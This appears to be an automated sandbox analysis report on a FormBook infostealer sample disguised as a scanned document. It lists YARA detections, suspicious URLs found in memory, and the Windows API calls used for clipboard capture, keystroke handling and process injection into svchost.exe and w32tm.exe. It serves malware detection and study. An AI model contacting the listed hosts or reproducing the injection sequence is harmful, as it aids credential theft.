Source: w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: w32tm.exe, 00000004.00000002.3923068718.0000000004A72000.00000004.10000000.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000002.3921887790.0000000003C82000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: w32tm.exe, 00000004.00000002.3911116744.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: w32tm.exe, 00000004.00000002.3911116744.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: w32tm.exe, 00000004.00000003.1822126322.00000000080D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: w32tm.exe, 00000004.00000002.3911116744.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: w32tm.exe, 00000004.00000002.3911116744.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: w32tm.exe, 00000004.00000002.3911116744.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: w32tm.exe, 00000004.00000002.3911116744.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: w32tm.exe, 00000004.00000002.3923068718.000000000442A000.00000004.10000000.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000002.3921887790.000000000363A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://ogbos88vip.click
Source: w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: w32tm.exe, 00000004.00000002.3924952824.00000000065F0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 00000004.00000002.3923068718.0000000004106000.00000004.10000000.00040000.00000000.sdmp, w32tm.exe, 00000004.00000002.3923068718.0000000004F28000.00000004.10000000.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000002.3921887790.0000000003316000.00000004.00000001.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000002.3921887790.0000000004138000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: w32tm.exe, 00000004.00000002.3923068718.000000000474E000.00000004.10000000.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000002.3921887790.000000000395E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.myfastuploader.sbs/y3ui/?O2ePNNH0=D47F9HanQoviz06wAFaQpWJrQYA3sEREFykOP0gieBCBMXnJAqL7dT

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_0088EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0088EAFF

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_0088ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0088ED6A

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

0_2_0088EAFF

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_0087AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0087AA57

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_008A9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_008A9576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1635374918.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3921258002.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3921287950.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3910307561.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1634925117.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3923632422.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1635925426.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3921356109.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: rHP_SCAN_DOCUME.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: rHP_SCAN_DOCUME.exe, 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_15ce03ab-2
Source: rHP_SCAN_DOCUME.exe, 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_1a76cd4a-6
Source: rHP_SCAN_DOCUME.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_af1e8386-e
Source: rHP_SCAN_DOCUME.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_3d4c21e6-f

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: rHP_SCAN_DOCUME.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042CCE3 NtClose,	2_2_0042CCE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B60 NtClose,LdrInitializeThunk,	2_2_03872B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03872DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038735C0 NtCreateMutant,LdrInitializeThunk,	2_2_038735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03874340 NtSetContextThread,	2_2_03874340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03874650 NtSuspendThread,	2_2_03874650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B80 NtQueryInformationFile,	2_2_03872B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BA0 NtEnumerateValueKey,	2_2_03872BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BE0 NtQueryValueKey,	2_2_03872BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BF0 NtAllocateVirtualMemory,	2_2_03872BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AB0 NtWaitForSingleObject,	2_2_03872AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AD0 NtReadFile,	2_2_03872AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AF0 NtWriteFile,	2_2_03872AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F90 NtProtectVirtualMemory,	2_2_03872F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FA0 NtQuerySection,	2_2_03872FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FB0 NtResumeThread,	2_2_03872FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FE0 NtCreateFile,	2_2_03872FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F30 NtCreateSection,	2_2_03872F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F60 NtCreateProcessEx,	2_2_03872F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872E80 NtReadVirtualMemory,	2_2_03872E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872EA0 NtAdjustPrivilegesToken,	2_2_03872EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872EE0 NtQueueApcThread,	2_2_03872EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872E30 NtWriteVirtualMemory,	2_2_03872E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DB0 NtEnumerateKey,	2_2_03872DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DD0 NtDelayExecution,	2_2_03872DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D00 NtSetInformationFile,	2_2_03872D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D10 NtMapViewOfSection,	2_2_03872D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D30 NtUnmapViewOfSection,	2_2_03872D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CA0 NtQueryInformationToken,	2_2_03872CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CC0 NtQueryVirtualMemory,	2_2_03872CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CF0 NtOpenProcess,	2_2_03872CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C00 NtQueryInformationProcess,	2_2_03872C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C60 NtCreateKey,	2_2_03872C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C70 NtFreeVirtualMemory,	2_2_03872C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873090 NtSetValueKey,	2_2_03873090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873010 NtOpenDirectoryObject,	2_2_03873010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038739B0 NtGetContextThread,	2_2_038739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873D10 NtOpenProcessToken,	2_2_03873D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873D70 NtOpenThread,	2_2_03873D70
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D4340 NtSetContextThread,LdrInitializeThunk,	4_2_035D4340
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D4650 NtSuspendThread,LdrInitializeThunk,	4_2_035D4650
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2B60 NtClose,LdrInitializeThunk,	4_2_035D2B60
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_035D2BF0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_035D2BE0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_035D2BA0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2AD0 NtReadFile,LdrInitializeThunk,	4_2_035D2AD0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2AF0 NtWriteFile,LdrInitializeThunk,	4_2_035D2AF0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2F30 NtCreateSection,LdrInitializeThunk,	4_2_035D2F30
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2FE0 NtCreateFile,LdrInitializeThunk,	4_2_035D2FE0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2FB0 NtResumeThread,LdrInitializeThunk,	4_2_035D2FB0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_035D2EE0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_035D2E80
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_035D2D10
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_035D2D30
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2DD0 NtDelayExecution,LdrInitializeThunk,	4_2_035D2DD0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_035D2DF0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_035D2C70
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2C60 NtCreateKey,LdrInitializeThunk,	4_2_035D2C60
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_035D2CA0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D35C0 NtCreateMutant,LdrInitializeThunk,	4_2_035D35C0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D39B0 NtGetContextThread,LdrInitializeThunk,	4_2_035D39B0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2B80 NtQueryInformationFile,	4_2_035D2B80
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2AB0 NtWaitForSingleObject,	4_2_035D2AB0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2F60 NtCreateProcessEx,	4_2_035D2F60
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2F90 NtProtectVirtualMemory,	4_2_035D2F90
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2FA0 NtQuerySection,	4_2_035D2FA0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2E30 NtWriteVirtualMemory,	4_2_035D2E30
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2EA0 NtAdjustPrivilegesToken,	4_2_035D2EA0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2D00 NtSetInformationFile,	4_2_035D2D00
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2DB0 NtEnumerateKey,	4_2_035D2DB0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2C00 NtQueryInformationProcess,	4_2_035D2C00
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2CC0 NtQueryVirtualMemory,	4_2_035D2CC0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D2CF0 NtOpenProcess,	4_2_035D2CF0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D3010 NtOpenDirectoryObject,	4_2_035D3010
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D3090 NtSetValueKey,	4_2_035D3090
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D3D70 NtOpenThread,	4_2_035D3D70
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035D3D10 NtOpenProcessToken,	4_2_035D3D10
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E896A0 NtCreateFile,	4_2_02E896A0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E89B20 NtAllocateVirtualMemory,	4_2_02E89B20
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E89810 NtReadFile,	4_2_02E89810
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E899C0 NtClose,	4_2_02E899C0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E89910 NtDeleteFile,	4_2_02E89910

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_0087D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0087D5EB

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_00871201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00871201

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_0087E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0087E8F6

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00882046	0_2_00882046
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00818060	0_2_00818060
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00878298	0_2_00878298
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0084E4FF	0_2_0084E4FF
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0084676B	0_2_0084676B
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_008A4873	0_2_008A4873
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0083CAA0	0_2_0083CAA0
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0081CAF0	0_2_0081CAF0
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0082CC39	0_2_0082CC39
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00846DD9	0_2_00846DD9
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_008191C0	0_2_008191C0
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0082B119	0_2_0082B119
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00831394	0_2_00831394
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00831706	0_2_00831706
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0083781B	0_2_0083781B
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_008319B0	0_2_008319B0
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00817920	0_2_00817920
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0082997D	0_2_0082997D
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00837A4A	0_2_00837A4A
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00837CA7	0_2_00837CA7
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00831C77	0_2_00831C77
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00849EEE	0_2_00849EEE
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0089BE44	0_2_0089BE44
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00831F32	0_2_00831F32
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_01074E88	0_2_01074E88
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418B73	2_2_00418B73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403090	2_2_00403090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410313	2_2_00410313
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042F333	2_2_0042F333
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402BC0	2_2_00402BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401420	2_2_00401420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416D6E	2_2_00416D6E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416D73	2_2_00416D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E513	2_2_0040E513
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410533	2_2_00410533
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E657	2_2_0040E657
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E663	2_2_0040E663
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E6AC	2_2_0040E6AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402750	2_2_00402750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039003E6	2_2_039003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA352	2_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C02C0	2_2_038C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F41A2	2_2_038F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039001AA	2_2_039001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F81CC	2_2_038F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830100	2_2_03830100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C8158	2_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383C7C0	2_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864750	2_2_03864750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385C6E0	2_2_0385C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03900591	2_2_03900591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EE4F6	2_2_038EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4420	2_2_038E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F2446	2_2_038F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F6BD7	2_2_038F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FAB40	2_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390A9A6	2_2_0390A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038268B8	2_2_038268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E8F0	2_2_0386E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384A840	2_2_0384A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03842840	2_2_03842840
